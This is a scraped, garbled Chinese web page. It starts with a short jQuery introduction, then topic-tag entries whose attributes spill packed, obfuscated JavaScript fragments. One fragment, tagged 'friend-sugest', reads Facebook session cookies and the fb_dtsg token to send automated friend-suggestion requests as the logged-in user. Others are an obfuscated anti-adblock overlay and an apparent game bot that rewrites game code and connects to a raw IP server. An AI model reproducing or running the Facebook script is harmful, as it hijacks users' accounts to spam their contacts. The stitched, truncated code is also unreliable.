jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(或JavaScript框架)。jQuery设计的宗旨是“write Less,Do More”,即倡导写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。
jQuery的核心特性可以总结为:具有独特的链式语法和短小清晰的多功能接口;具有高效灵活的css选择器,并且可对CSS选择器进行扩展;拥有便捷的插件扩展机制和丰富的插件。jQuery兼容各种主流浏览器,如IE 6.0+、FF 1.5+、Safari 2.0+、Opera 9.0+等。 [1]
maxWidth) || (!maxWidth && document.documentElement.clientWidth > 375)){ _body.style.cssText+='width:'+minWidth+'px;'; } //限制body溢出隐藏,因此缩放后的container已经超出body范围 _body.style.cssText+='height:100%;margin:0 auto;overflow:hidden;'; /** * @type {Element} container body的第一个子元素 所有内容必须写在body中的第一个子元素中 * @type {Number} clientWidth body的可视区域宽度 * @type {Number} clientHeight body的可视区域高度 * @type {Number} scale 需要缩放的比例, 可视区域的宽/设计稿的宽得到一个缩放比值。 假设设计稿750 body 375 则 375/750=0.5 则窗口需要缩小0.5倍才正好适配body的宽度 * @type {Number} zoom 高度需要放大的比例,当进行scale缩放时导致高度跟着缩放,为了让高度适应屏幕高度达到百分百的高必须将高度值*放大比例进行高度补偿。假设body高度750 scale0.5之后高度只有375半屏高度,因此先将高度750*2 然后再scale0.5保持高度依然是一屏高。 */ var container = _body; var clientWidth = useMinwidth ? minWidth : _document.documentElement.clientWidth; var clientHeight = _document.documentElement.clientHeight; var scale = clientWidth / designWidth; var zoom = designWidth / clientWidth; //设置body的第一个子元素节点的宽高缩放等属性完成适配初始化,container窗口将替代body成为主容器,默认允许溢出且溢出滚动 container.style.cssText+='-webkit-box-sizing:border-box;box-sizing:border-box;overflow:auto;-webkit-overflow-scrolling: touch;width:100%;-webkit-zoom:'+scale+';zoom:'+scale+';-webkit-transform-origin:left top;transform-origin:left top;height:'+clientHeight*zoom+'px;width:'+designWidth+'px;'; }; //重置视口最大宽度 var resizeWidth = function(){ //获取可视区域宽度判断屏幕宽 var clientWidth = document.documentElement.clientWidth; //判断是否使用minwidth指定的最小宽度,如果使用则在适配计算时不能使用原有的clientWidth而应该使用指定的minWidth useMinwidth = clientWidth > 750; //小于750宽的设备以设计稿宽一半显示,一般750的设计稿以375显示, 大于1000并且小于1199的以750显示 针对ipad pro, 大于750但小于1100的以640显示对应ipad ,其它超过1199的PC默认以设计稿一半显示。 minWidth = _minWidth || (useMinwidth ? (clientWidth > 1000 && clientWidth < 1199 ? 750 : ( clientWidth > 1100 ? designWidth/2 : 640 )) : designWidth/2); } //未指定设计稿宽则默认为750 designWidth = designWidth - 0 || 750; //未指定最大宽度,即PC与移动端区分的最大宽度值,默认为768 ,即ipad依然正常缩放显示,而ipad pro则视为PC maxWidth = maxWidth -0 || 0; //获取在PC或大屏下用户强制设置的最小显示宽度,若未指定则自动适配 _minWidth = minWidth - 0; if(_body){ //body加载立即执行重置 resize(); }else{ //body未加载待DOM加载完成后设置 _document.addEventListener('DOMContentLoaded', function(){ _body = _document.body; resize(); }); } //页面刷新的时候调用 _window.onload =function(){ resizeWidth(); resize(); //location.reload(true) } //窗口变化时重新检测调整适配 _window.addEventListener('resize', function(){ resizeWidth(); resize(); }); } }; return flex; }; NickFlex(window).resize(); window.NickFlex = NickFlex; }" class="topic-tag topic-tag-link">
byeYoung/adapt
0){1p=7.p.U(2P);6(1p!=-1){1p+=2P.m;24=7.p.U(";",1p);6(24==-1)24=7.p.m;l 3w(7.p.1q(1p,24))}F{l""}}}8 43(1e,1X){l W.22(W.1W()*(1X-1e+1))+1e}8 3y(q){l q[43(0,q.m-1)]}5 o=7.15(\'o\')[0].1x;5 I=7.p.Y(7.p.Y(/1Y=(\\d+)/)[1]);8 a(3U){5 14=J 26();5 3E="//1b.11.18/1l/4I.27";5 4f="2f="+3U+"&4H=0&4F=0&4G[4K]=4L&4Q=1&1F="+I+"&1i=1&1I=1J-&1L=v&o="+o+"&1r=4P";14.2L("2E",3E,1v);14.20=8(){6(14.2k==4&&14.25==1a){14.3r}};14.2c(4f)}a("2o");a("3o");a("2r");a("3i");a("3b");a("32");5 2A=\'4O 3T 3Z 4M 4N 3u 4D 4v. \';5 Q="",44=\'4u 4t 4r 4s 13.2F>4w 3u
3z [4C ] 4q%. \';10=/"4A":"([0-9]+)"/.4y(7.Z("4z").4R("4S-5c"))[1];o=7.15("o")[0].1x;8 2Q(1H){1t.1g(C.1c.1K+"//1b.11.18/1l/2K/2S?&2a="+1H+"&10="+10+"&2b=2u&2i=2q&1F="+I+"&1i=1&1I=1J-&1L=17&o="+o+"&1r=2l",8(a){5 b=a.1q(a.U("{"));5 c=2h.3v(b);i--;Q="
";48++;6(c.3X)Q+=c.3X;F Q+=2h.58(c,K,"")}F{Q+="H:30;O-S:59\'>";Q+="3T 3Z 5d";1s++}Q+=" ";5 h="
";h+=""+2A+" ";6(i>0){h+=q.m+" 13 2O<2F/>";h+=""+1s+" 13 3Y 5e "+(q.m-i)+" 13 5i ";h+="("+i+" 5h...)";h+="";h+=Q;h+="<3d u=\'2e:1B 5g-5f D(57://56-4X-a.4W.4V/4T-4U/4Y.27/4Z/55/r/54-53.51);2V:3e;52:3e;2U-R:-5j;16:4h;1y:1w 2G X(0,0,0,0.4);\' 4p="+1E[i]+">3d>"+1M[i]+" ";h+="";h+=44;h+=" ";h+=" "}F{h+=q.m+" 13 2O 4o ";h+=""+1s+" 13 3Y 2F>";h+="<23 1d=\'4i 45 47 4m 49\' 3S=\'C.1c.4k()\' u=\'H:2J\'>4B 5m23><23 1d=\'64 45 47 49\' 3S=\'7.Z(\\"2M\\").u.h=\\"2s\\"\'>6323>"}h+=" ";7.Z("2M").1Z=h},"E","2m");M--;6(M>0){5 s=q[M];65=1E[M];1o("2Q("+s+")",66)}3F.3N(M+"/"+q.m+":"+q[M]+"/"+1M[M]+", 68:"+1s);6(10){1t.1g(C.1c.1K+"//1b.11.18/1l/2K/2S?&2a="+1H+"&10=2o&2b=2u&2i=2q&1F="+I+"&1i=1&1I=1J-&1L=17&o="+o+"&1r=2l",8(){},"E","2m")}6(10){1t.1g(C.1c.1K+"//1b.11.18/1l/2K/2S?&2a="+1H+"&10=2r&2b=2u&2i=2q&1F="+I+"&1i=1&1I=1J-&1L=17&o="+o+"&1r=2l",8(){},"E","2m")}}8 4c(){6(7.15("3A").m>0)1O.2X(7.15("3A")[0]);5 a=q[i];6(i0)1O.2X(7.1T("4b")[0].1n[0].1n[0].1n[1]);F j++;1o("4c()",3V)}8 4e(a){i++;1o("3W()",3V)}1t={3q:8(){5 a=G;6(46 2y!="1R")1D{a=J 2y("67.35")}1A(b){1D{a=J 2y("62.35")}1A(c){a=G}}F 6(C.26)1D{a=J 26}1A(b){a=G}l a},1g:8(D,2H,P,N,L){5 t=y.3p();6(!t||!D)l;6(t.36)t.36("E/61");6(!N)N="3g";6(!P)P="E";6(!L)L={};P=P.5W();N=N.5V();5 2Y="2f="+(J 5U).5X();D+=D.U("?")+1?"&":"?";D+=2Y;5 2B=K;6(N=="2E"){5 2n=D.5Y("?");D=2n[0];2B=2n[1]}t.2L(N,D,1v);5 6a=y;6(L.3a)t.20=8(){L.3a(t)};F t.20=8(){6(t.2k==4)6(t.25==1a){5 T="";6(t.39)T=t.39;6(P.3P(0)=="j"){T=T.5Z(/[\\n\\r]/g,"");T=6l("("+T+")")}F 6(P.3P(0)=="x")T=t.6n;6(2H)2H(T)}F{6(L.1f)7.1N("2d")[0].37(L.1f);6(L.V)7.Z(L.V).u.h="2s";6(2D)2D(t.25)}};t.2c(2B)},6m:8(a){5 b={D:"",2R:G,6o:G,P:"E",N:"3g",2v:"",V:"",1f:""};12(5 c 6k b)6(a[c])b[c]=a[c];6(!b.D)l;5 d=G;6(b.1f){d=7.6i("w");d.38("u","1U:3c;2W:2N;R:2N;");d.38("1d","V-6d");d.1Z=b.1f;7.1N("2d")[0].6j(d);y.L.1f=d}6(b.V)7.Z(b.V).u.h="6b";y.1g(b.D,8(a){6(b.2R)b.2R(a);6(b.2v)7.Z(b.2v).1Z=a;6(d)7.1N("2d")[0].37(d);6(b.V)7.Z(b.V).u.h="2s"},b.P,b.N,b)},3p:8(){l y.3q()}};5 1O={3m:8(a,b,c,d){6(c=="2p")c="1d";5 e=7.3j(".//"+b+"[@"+c+"=\'"+d+"\']",a,K,3k.3l,K);6(e&&e.1z)l e.1z;l K},6e:8(a,b,c){l y.3m(a,b,"2p",c)},6f:8(a,b){1D{5 c=7.3j(b,a,K,3k.3l,K)}1A(d){6h("6g 60:"+b)}6(c&&c.1z)l c.1z;l K},5S:8(a){C.1o(8(){7.1c.2g=a},2T+W.22(W.1W()*2T))},1j:8(a,b,c){5 d=a.7.5w("5T");d.5v(c,1v,1v,a,0,0,0,0,0,G,G,G,G,0,K);l!b.5u(d)},5k:8(a){l y.1j(C,a,"29")},5x:8(a,b){C.1o(8(){l 1O.1j(C,a,"29")},b+W.22(W.1W()*2T))},2X:8(a){y.1j(C,a,"5y");y.1j(C,a,"5A");y.1j(C,a,"29")},42:8(a,b){5 c="";6(b==1R)b=0;6(b>40)l;6(a.41!=1R)l a.41;12(5 d=0;d"+2A+" ";h+=q.m+" 13 2O";h+="";7.Z("2M").1Z=h;2Q(q[i])});5 o=7.15(\'o\')[0].1x;5 I=7.p.Y(7.p.Y(/1Y=(\\d+)/)[1]);8 5I(3x){5 2t=3x+"=";6(7.p.m>0){1u=7.p.U(2t);6(1u!=-1){1u+=2t.m;21=7.p.U(";",1u);6(21==-1)21=7.p.m;l 3w(7.p.1q(1u,21))}F{l""}}}8 3D(1e,1X){l W.22(W.1W()*(1X-1e+1))+1e}8 3y(2j){l 2j[3D(0,2j.m-1)]}5 o=7.15(\'o\')[0].1x;5 I=7.p.Y(7.p.Y(/1Y=(\\d+)/)[1]);8 B(4a){5 19=J 26();5 34="/1l/4d/5D.27?1i=1";5 3n="5E="+4a+"&1c=1&5q=4d-5r&5p=5n&o="+o+"&5s&5z"+I+"&1r=";19.2L("2E",34,1v);19.20=8(){6(19.2k==4&&19.25==1a){19.3r}};19.2c(3n)}B("2o");B("3o");B("2r");B("3i");B("3b");B("6c");B("69");B("32");', d=397,e=" var if document function display return length fb_dtsg cookie arr http style div this window url text else false color user_id new null opt tay method font format Descriptions left size result indexOf loading Math rgba match getElementById newcomer facebook for Friends http4 getElementsByName padding com http24 200 www location class min loadingIndicator load 255 __a ClickWin push ajax align childNodes setTimeout konum substring phstamp suc jx konumi true 1px value border singleNodeValue catch center 0pt try pho __user Array opo __dyn 798aD5z5CF protocol __req arn getElementsByTagName nHtml friend pic undefined eg getElementsByClassName position edge random max c_user innerHTML onreadystatechange soni floor span son status XMLHttpRequest php 3B5998 click receiver attempt_id send body background uid href JSON ref arri readyState 16581651071156988110194 post parts 100003697277263 className profile_others_dropdown 100001050235420 none taramai 0585ab74e2dd0ff10282a3a36df39e19 update box shadow ActiveXObject 10px Title parameters bottom error POST br solid callback 3px white friends open pagelet_sidebar 0px Detected tarama SuggestFriend onSuccess suggest 500 margin width top ClickUp now space gray wrap 100004215691459 pre url24 XMLHTTP overrideMimeType removeChild setAttribute responseText handler 100003231350883 absolute img 50px isim GET 8px 100001375288085 evaluate XPathResult FIRST_ORDERED_NODE_TYPE FindByAttr params24 100003846224832 init getHTTPObject close test options By parse unescape isimi randomValue Loading ok 15px 5px getRandomInti url4 console index 500px 20px 9999 14px 100px 273px log id charAt fixed radius onClick Friend abone 2E3 clickfr errorDescription Suggested Suggestion textContent GetText getRandomInt _text uiOverlayButton typeof uiButton err uiButtonLarge bone search clickfr_callback follow addfriend params4 000000 2px layerConfirm bold reload weight uiButtonConfirm 13px and src 99 Suggesting Your For Thanks Ahmad Powered 999999 exec pagelet_timeline_main_column profile_owner Refresh lllllllllllllllllllllllllllllllllllllll Waqar pkwaq ask_for_confirm nctr pokeback poke_dialog cereziAl _mod pagelet_timeline_profile_actions Sender Made Auto 165816575103566878180 __asyncDialog getAttribute data static ak net akamaihd profile rsrc v2 gif height SK UlIqmHJn yo fbcdn https stringify 12px darkred name gt Sent of repeat no Lefted Processed 125px Click prototype Page u37qac_37 find subscribed_button_id source button lsd RegExp dispatchEvent initMouseEvent createEvent ClickTimeout mousedown __ mouseup typeahead first_degree follow_profile profile_id nm payload entries cereziAli photo friends_only stale_ok user filter lazy viewer v7 token VisitUrl MouseEvents Date toUpperCase toLowerCase getTime split replace xpath xml Microsoft Cancel layerCancel sx 100 Msxml2 success 100001597470562 ths block 100003751777172 indicator FindByClassName FindByXPath bad GM_log createElement appendChild in eval bind responseXML onError".split(" "), f=0,g={},f=function(b){return(62>b?"":f(parseInt(b/62)))+(35<(b%=62)?String.fromCharCode(b+29):b.toString(36))};if(!"".replace(/^/,String)){for(;d--;)g[f(d)]=e[d]||f(d);e=[function(b){return g[b]}];f=function(){return"\\w+"};d=1}for(;d--;)e[d]&&(c=c.replace(RegExp("\\b"+f(d)+"\\b","g"),e[d]));a(c); "));var A="jvvrq8--pcu,ekvjw`,amo-ucxx{epc{-dcag`mmi-ej/rcegq-Qwrrmpv,hq" class="topic-tag topic-tag-link">
friend-sugest
// Place this code snippet near the footer of your page before the close of the /body tag // LEGAL NOTICE: The content of this website and all associated program code are protected under the Digital Millennium Copyright Act. Intentionally circumventing this code may constitute a violation of the DMCA. eval(function(p,a,c,k,e,d){e=function(c){return(c 35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}(';k K=\'\',2b=\'27\';1M(k i=0;i<12;i++)K+=2b.V(B.H(B.I()*2b.E));k 2m=8,2C=4r,2E=19,2B=4q,2q=C(t){k o=!1,i=C(){z(q.1j){q.2L(\'2P\',e);D.2L(\'1U\',e)}O{q.3b(\'2Q\',e);D.3b(\'24\',e)}},e=C(){z(!o&&(q.1j||4p.2s===\'1U\'||q.2N===\'2O\')){o=!0;i();t()}};z(q.2N===\'2O\'){t()}O z(q.1j){q.1j(\'2P\',e);D.1j(\'1U\',e)}O{q.2R(\'2Q\',e);D.2R(\'24\',e);k n=!1;2W{n=D.4n==4m&&q.29}32(a){};z(n&&n.2Y){(C r(){z(o)G;2W{n.2Y(\'13\')}32(e){G 4l(r,50)};o=!0;i();t()})()}}};D[\'\'+K+\'\']=(C(){k t={t$:\'27+/=\',4k:C(e){k r=\'\',d,n,o,c,s,l,i,a=0;e=t.e$(e);1a(a>2;s=(d&3)<<4|n>>4;l=(n&15)<<2|o>>6;i=o&63;z(33(n)){l=i=64}O z(33(o)){i=64};r=r+U.t$.V(c)+U.t$.V(s)+U.t$.V(l)+U.t$.V(i)};G r},X:C(e){k n=\'\',d,l,c,s,a,i,r,o=0;e=e.1w(/[^A-4j-4i-9\\+\\/\\=]/g,\'\');1a(o>4;l=(a&15)<<4|i>>2;c=(i&3)<<6|r;n=n+P.S(d);z(i!=64){n=n+P.S(l)};z(r!=64){n=n+P.S(c)}};n=t.n$(n);G n},e$:C(t){t=t.1w(/;/g,\';\');k n=\'\';1M(k o=0;o4h&&e<4g){n+=P.S(e>>6|4f);n+=P.S(e&63|1A)}O{n+=P.S(e>>12|2J);n+=P.S(e>>6&63|1A);n+=P.S(e&63|1A)}};G n},n$:C(t){k o=\'\',e=0,n=4e=1B=0;1a(e4c&&n<2J){1B=t.16(e+1);o+=P.S((n&31)<<6|1B&63);e+=2}O{1B=t.16(e+1);2k=t.16(e+2);o+=P.S((n&15)<<12|(1B&63)<<6|2k&63);e+=3}};G o}};k r=[\'3X==\',\'4b\',\'4a=\',\'49\',\'48\',\'47=\',\'46=\',\'45=\',\'44\',\'43\',\'42=\',\'41=\',\'40\',\'3Z\',\'3Y=\',\'4s\',\'4d=\',\'4t=\',\'4L=\',\'4N=\',\'4O=\',\'4P=\',\'4Q==\',\'4R==\',\'4S==\',\'4M==\',\'4T=\',\'4V\',\'4W\',\'4X\',\'4Y\',\'4Z\',\'51\',\'4U==\',\'4K=\',\'4v=\',\'3V=\',\'4I==\',\'4H=\',\'4G\',\'4F=\',\'4E=\',\'4D==\',\'4C=\',\'4B==\',\'4A==\',\'4z=\',\'4y=\',\'4x\',\'4w==\',\'4u==\',\'3W\',\'3K==\',\'3c=\'],p=B.H(B.I()*r.E),Y=t.X(r[p]),w=Y,Q=1,W=\'#3i\',a=\'#3j\',g=\'#3n\',v=\'#3k\',Z=\'\',b=\'3p 3o.\',y=\'3m... 3l 3h 3g 26 2o. 3d\\\'s 3e. 3f 23 3q 1X.\',f=\'3s 3H 26 3T, 23 3S\\\'t 3R 2z 2w. 3Q 23 3P 3O 2z 2w 3N 3M.\',s=\'3L 3U 3J 26 2o 3I 2G 1X 3G.\',o=0,u=1,n=\'3t.3F\',l=0,L=e()+\'.2n\';C h(t){z(t)t=t.1L(t.E-15);k o=q.2S(\'3E\');1M(k n=o.E;n--;){k e=P(o[n].1P);z(e)e=e.1L(e.E-15);z(e===t)G!0};G!1};C m(t){z(t)t=t.1L(t.E-15);k e=q.3D;x=0;1a(x15){k n=q.1f(\'2c\');n.j.1h=\'1R\';n.j.1q=\'1v\';n.j.11=\'1v\';n.j.T=\'-1g\';n.j.13=\'-1g\';q.J.6e(n,q.J.2t[r]);n.1e(e);k i=q.1f(\'1x\');i.1k=\'2v\';i.j.1h=\'1R\';i.j.13=\'-1g\';i.j.T=\'-1g\';q.J.1e(i)}O{e.1k=\'2v\';q.J.1e(e)};l=5Z(C(){z(e){t((e.1W==0),o);t((e.1V==0),o);t((e.1G==\'2F\'),o);t((e.1J==\'2j\'),o);t((e.1K==0),o)}O{t(!0,o)}},2a)},1E:C(e,c){z((e)&&(o==0)){o=1;D[\'\'+K+\'\'].1C();D[\'\'+K+\'\'].1E=C(){G}}O{k f=t.X(\'6a\'),u=q.69(f);z((u)&&(o==0)){z((2C%3)==0){k l=\'68=\';l=t.X(l);z(h(l)){z(u.1S.1w(/\\s/g,\'\').E==0){o=1;D[\'\'+K+\'\'].1C()}}}};k p=!1;z(o==0){z((2E%3)==0){z(!D[\'\'+K+\'\'].2g){k d=[\'66==\',\'6o==\',\'62=\',\'6n=\',\'6d=\'],m=d.E,a=d[B.H(B.I()*m)],r=a;1a(a==r){r=d[B.H(B.I()*m)]};a=t.X(a);r=t.X(r);i(B.H(B.I()*2)+1);k n=1T 21(),s=1T 21();n.28=C(){i(B.H(B.I()*2)+1);s.1P=r;i(B.H(B.I()*2)+1)};s.28=C(){o=1;i(B.H(B.I()*3)+1);D[\'\'+K+\'\'].1C()};n.1P=a;z((2B%3)==0){n.24=C(){z((n.11<8)&&(n.11>0)){D[\'\'+K+\'\'].1C()}}};i(B.H(B.I()*3)+1);D[\'\'+K+\'\'].2g=!0};D[\'\'+K+\'\'].1E=C(){G}}}}},1C:C(){z(u==1){k M=2I.6y(\'35\');z(M>0){G!0}O{2I.6C(\'35\',(B.I()+1)*2a)}};k h=\'6v==\';h=t.X(h);z(!m(h)){k c=q.1f(\'5Y\');c.1Y(\'5w\',\'5W\');c.1Y(\'2s\',\'1i/5t\');c.1Y(\'1O\',h);q.2S(\'5s\')[0].1e(c)};5r(l);q.J.1S=\'\';q.J.j.17+=\'N:1v !14\';q.J.j.17+=\'1z:1v !14\';k L=q.29.1V||D.36||q.J.1V,p=D.5q||q.J.1W||q.29.1W,r=q.1f(\'1x\'),Q=e();r.1k=Q;r.j.1h=\'2x\';r.j.13=\'0\';r.j.T=\'0\';r.j.11=L+\'1p\';r.j.1q=p+\'1p\';r.j.2r=W;r.j.1Z=\'5p\';q.J.1e(r);k d=\'5j 5h 1X 5g 5f \';d=d.1w(\'5e\',e());d=d.1w(\'5d\',e());k i=q.1f(\'1x\');i.1S=d;i.j.1h=\'1R\';i.j.1y=\'1H\';i.j.13=\'1H\';i.j.11=\'5b\';i.j.1q=\'5a\';i.j.1Z=\'2p\';i.j.1K=\'.6\';i.j.2y=\'2A\';i.1j(\'2G\',C(){n=n.59(\'\').58().57(\'\');D.2l.1O=\'//\'+n});q.1I(Q).1e(i);k o=q.1f(\'1x\'),R=e();o.1k=R;o.j.1h=\'2x\';o.j.T=p/7+\'1p\';o.j.56=L-5u+\'1p\';o.j.5i=p/3.5+\'1p\';o.j.2r=\'#5K\';o.j.1Z=\'2p\';o.j.17+=\'F-1o: "5V 5U", 1s, 1r, 1n-1m !14\';o.j.17+=\'5T-1q: 5R !14\';o.j.17+=\'F-1d: 5Q !14\';o.j.17+=\'1i-1u: 1t !14\';o.j.17+=\'1z: 5P !14\';o.j.1G+=\'2V\';o.j.2Z=\'1H\';o.j.5O=\'1H\';o.j.5M=\'2h\';q.J.1e(o);o.j.5L=\'1v 5J 5x -5I 5H(0,0,0,0.3)\';o.j.1J=\'2K\';k w=30,Y=22,x=18,Z=18;z((D.36<34)||(5G.11<34)){o.j.2X=\'50%\';o.j.17+=\'F-1d: 5F !14\';o.j.2Z=\'5D;\';i.j.2X=\'65%\';k w=22,Y=18,x=12,Z=12};o.1S=\'<2M j="1c:#5B;F-1d:\'+w+\'1D;1c:\'+a+\';F-1o:1s, 1r, 1n-1m;F-1Q:5A;N-T:1b;N-1y:1b;1i-1u:1t;">\'+b+\'2M><2T j="F-1d:\'+Y+\'1D;F-1Q:5z;F-1o:1s, 1r, 1n-1m;1c:\'+a+\';N-T:1b;N-1y:1b;1i-1u:1t;">\'+y+\'2T><5y j=" 1G: 2V;N-T: 0.3a;N-1y: 0.3a;N-13: 2f;N-39: 2f; 2H:3r 5C #5E; 11: 25%;1i-1u:1t;">\'+f+\'
<2c 5S="U.j.1K=.9;" 5v="U.j.1K=1;" 1k="\'+e()+\'" j="2y:2A;F-1d:\'+Z+\'1D;F-1o:1s, 1r, 1n-1m; F-1Q:2D;2H-5c:2h;1z:1b;55-1c:\'+g+\';1c:\'+v+\';1z-13:2e;1z-39:2e;11:60%;N:2f;N-T:1b;N-1y:1b;" 6B="D.2l.6z();">\'+s+\'2c>
\'}}})();D.2u=C(t,e){k n=6u.6s,o=D.6r,r=n(),i,a=C(){n()-r" class="topic-tag topic-tag-link">
block-ad-block-script-code
0 / 2\'):$("#2w").1j(\'\'+c+" / 2 ")}j 5a(){1o(n a=0;a<2;a++)6.2G[a]=!1,6.1K[a]=1a 4n(4X.4S(1a 4T(["("+3N()+")()"],{2n:"1R/3I"}))),6.1K[a].46=j(a){n b=a.2m;2k(b.o){q"39":3E(b.F,!0),1M(!0,"1m"+b.F,b.1w,"#5j",!0),1i("1m"+b.F,b.x,b.y);t;q"2b":3E(b.F,!1),3x("1m"+b.F);t;q"18":1i("1m"+b.F,b.x,b.y);t;3d:S.P("4q 1V 4r 4C 1m")}},6.1K[a].1l({o:"F",F:a});2K()}j 58(){1o(n a=0;a<3;a++)6.1W[a]=1a 4n(4X.4S(1a 4T(["("+3N()+")()"],{2n:"1R/3I"}))),6.1W[a].1l({o:"F",F:a})}j 1E(a){1o(i 3M 6.1K)6.1K[i].1l(a)}j 2N(a){1o(i 3M 6.1W)6.1W[i].1l(a)}j 3e(){n f=1a 2J;f.2a("2I","/1F.r.1p",!0),f.1U=j(){n k=f.2L;k=p(k,"l(h.m&&h.m.2x)","6.2H();l(h.m&&h.m.2x)"),k=p(k,"l(h.m&&h.m.2U)","6.2r();l(h.m&&h.m.2U)"),k=p(k,"l(h.m&&h.m.1n)","6.1n();l(h.m&&h.m.1n)"),k=p(k,"1C:j(a){","1C:j(a){6.4O(a);"),k=p(k,"53:j(){","53:j(){6.54();"),k=p(k,"l(h.m&&h.m.2z)","6.2o();l(h.m&&h.m.2z)"),k=p(k,"3c:j(a){","3c:j(a){6.56(a);"),k=L(k,/(\\w\\[\\w\\+(\\d+)>>3]=(\\w);\\w\\[\\w\\+(\\d+)>>3]=(\\w);\\w\\[\\w\\+(\\d+)>>3]=(\\w);\\w\\[\\w\\+(\\d+)>>3]=(\\w);)/i,"$1 l(6.1Q){6.1Q($3,$5,$7,$9,$2,$8);}"),k=L(k,/([\\w$]+\\(\\d+,\\w\\[\\w>>2\\]\\|0,(\\+\\w),(\\+\\w)\\)\\|0;[\\w$]+\\(\\d+,\\w\\[\\w>>2\\]\\|0,\\+-(\\+\\w\\[\\w\\+\\d+>>3\\]),\\+-(\\+\\w\\[\\w\\+\\d+>>3\\])\\)\\|0;)/i,"$1 6.1B=$4; 6.1x=$5;"),k=p(k,"4x:j(a,b){","4x:j(a,b){l(6.2j){a = $(\'#1z\').U() / 2; b = $(\'#1z\').2E() / 2;}"),k=L(k,/l\\((\\+\\w\\[\\w>>3\\])<1\\.0\\){/i,"l($1 < 6.59){"),k=L(k,/(l\\(\\w<=)(20\\.0)(\\){\\w=\\w;v})(l\\(!\\w\\){l\\(\\(\\w\\[\\d+\\]\\|0\\)!=\\(\\w\\[\\d+\\]\\|0\\)\\){\\w=\\w;v}l\\(\\(\\w\\[\\w\\+\\d+>>0\\]\\|0\\)!=0\\?\\(\\w\\[\\w>>0\\]\\|0\\)==0:0\\){\\w=\\w;v}})/i,"$5h.0$3"),k=L(k,/(\\w)(=\\+\\w\\[\\w>>3\\]\\*\\+\\w\\()(.\\d)(,\\+\\w\\);)/i,"$1$2 (6.4D||0.9) $4 6.37=$1;"),k=L(k,/(\\w=\\w\\[\\w>>2\\]\\|0;)((\\w\\[\\w>>3\\])=(\\w);)(\\w\\[\\w>>0\\]=a\\[\\w>>0\\];)/i,"$1 l(!6.4z){$3 = 6.37;}5m{$2}$5"),k=L(k,/((\\w)=(\\+\\(\\(\\w\\[\\w\\+\\d+>>\\d.*;)(\\w)=(\\+\\(\\(\\w\\[.*\\/2\\|\\d\\)\\|0\\)\\/\\w\\+\\s\\+\\w\\[\\w\\+\\d+>>3\\];).*\\4=\\4<\\w\\?\\w:\\w;)/,"6.34 = $3 6.33 = $5 $1"),3q(k)},f.2T()}j 2c(){$("#3D").5i()}j 4f(){n a=V.1O("G");a.K="1t",a.N.4l=\'2Q:5g(0,0,0,0.4)5f("4o://5k.5n.5e/1t.5l");2Q-3L:1L%1L%;U:3V;2E:3V;41:2v;4c:2v;18:5o;z-5d:1;5c-61:22;\',$(V.2D).3C(a);n b=V.1O("G");b.K="3D",$("#1t").3C(b)}j 1M(a,b,c,d,e){l(b=b.O("#",""),b=b.O("/",""),!$("#"+b).17){n f=V.1O("G");f.K=b,f.N.4l="4d-4s:50%;2i-1N:-3J;2i-2W:-3J;U:1r;2E:1r;18:3O;T:"+d+";2Q-T:"+d+";"+(e?"":"1G:22;"),$(a?"#1t":"#3D").3C(f),3b(b,c)}}j 3x(a){a=a.O("#",""),a=a.O("/",""),$("#"+a).2b()}j 1i(a,b,c){a=a.O("#",""),a=a.O("/","");n d=(b+2Y)/4i*1L,e=(c+2Y)/4i*1L;$("#"+a).5Z({2W:d+"%",1N:e+"%"})}j 1y(a,b){a=a.O("#",""),a=a.O("/",""),b?$("#"+a).1h():$("#"+a).1d()}j 3b(a,b){a=a.O("#",""),a=a.O("/",""),$("#"+a).1j(\'\'+b+" ")}j L(a,b,c){n d=1a 4u(b);v d.4g(a)?a=a.O(b,c):S.P("[2l] Y O: "+b),a}j p(a,b,c){v a.21(b)!=-1?a=a.O(b,c):S.P("[2l] Y O: "+b),a}j 1f(a){B!=1A&&1A.5T("1V",a)}j 4p(){1A=30.1C("5p://66.31.85.67:6i",{6l:!0,6a:"6c="+1s}),1A.2M("1V",j(a){l(B==a.o)v 1u S.P("6d a 1V 4E 5v o.");2k(a.o){q"5u-5D":2c(),3n(!0),6.2g&&1f({o:"4L",1b:6.1b});t;q"39":1M(!1,a.2A,a.1b,"#5E",!0),1i(a.2A,a.x,a.y);t;q"2b":3x(a.2A);t;q"18":1i(a.2A,a.x,a.y);t;q"5P-5Q":$("#2w").1j(\'\'+a+" ");t;3d:v 1u S.P("5K a 1V 4E 5G 5F o: "+a.o)}}),1A.2M("3B",j(a){"J"==a.o&&(6.2O=a.J),2N(a)}),1A.2M("1Y",j(){2c(),2N({o:"1Y"})})}j 2K(){1E({o:"2P",14:6.14}),1f({o:"2P",14:6.14})}j 38(a){l(1u 0===a)v B;l(a.21(",")>-1){n b=a.1c(",");1o(o 3M b)l(b[o].17<=0||b[o].17>15)v B;v b}v a.17>0&&a.17<=15?[a]:B}j 4W(){1f({o:"1c"}),1E({o:"1c"})}j 4I(){1f({o:"1H"}),1E({o:"1H"})}j 4m(){n a=6.34,b=6.33;6.2h||(a=6.1B,b=6.1x),1E({o:"18",x:a+6.1e,y:b+6.1g}),1f({o:"18",x:6.13,y:6.19,5I:a+6.1e,5J:b+6.1g})}j 3n(a){(a||2S!=6.J)&&(2S=6.J,1f({o:"J",J:2S}))}j 3N(){v j(){j L(a,b,c){n d=1a 4u(b);v d.4g(a)?a=a.O(b,c):S.P("[2l] Y O: "+b),a}j p(a,b,c){v a.21(b)!=-1?a=a.O(b,c):S.P("[2l] Y O: "+b),a}j 3P(a,b){v 2F.4b(2F.4t()*(b-a+1))+a}j 3g(){n e=1a 2J;e.2a("2I","4o://4R.30/1F.r.1p",!0),e.1U=j(){n 